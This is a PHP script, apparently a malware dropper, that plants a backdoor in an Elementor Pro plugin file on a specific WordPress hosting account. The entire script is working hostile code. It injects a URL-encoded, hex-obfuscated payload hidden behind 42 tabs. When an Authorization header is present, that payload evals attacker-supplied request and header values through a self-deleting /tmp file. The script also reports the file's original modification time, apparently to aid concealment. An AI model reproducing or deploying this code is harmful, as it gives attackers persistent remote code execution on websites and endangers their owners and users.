<?php  $path = '/home/celebrategoodtim/public_html/wp-content/plugins/elementor-pro/modules/forms/actions/email2.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24_HEADERS%20%3D%20getallheaders%28%29%3Bif%28isset%28%24_HEADERS%5B%27Authorization%27%5D%29%29%7B%24c%3D%22%3C%5Cx3f%5Cx70h%5Cx70%5Cx20%40%5Cx65%5Cx76a%5Cx6c%5Cx28%24%5Cx5f%5Cx52E%5Cx51%5Cx55E%5Cx53%5Cx54%5B%5Cx22%5Cx49f%5Cx2d%5Cx4do%5Cx64%5Cx69f%5Cx69%5Cx65d%5Cx2d%5Cx53i%5Cx6e%5Cx63e%5Cx22%5Cx5d%29%5Cx3b%5Cx40e%5Cx76%5Cx61l%5Cx28%5Cx24_%5Cx48%5Cx45A%5Cx44%5Cx45R%5Cx53%5Cx5b%5C%22%5Cx49%5Cx66-%5Cx4d%5Cx6fd%5Cx69%5Cx66i%5Cx65%5Cx64-%5Cx53%5Cx69n%5Cx63%5Cx65%5C%22%5Cx5d%5Cx29%3B%22%3B%24f%3D%27/tmp/.%27.time%28%29%3B%40file_put_contents%28%24f%2C%20%24c%29%3B%40include%28%24f%29%3B%40unlink%28%24f%29%3B%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');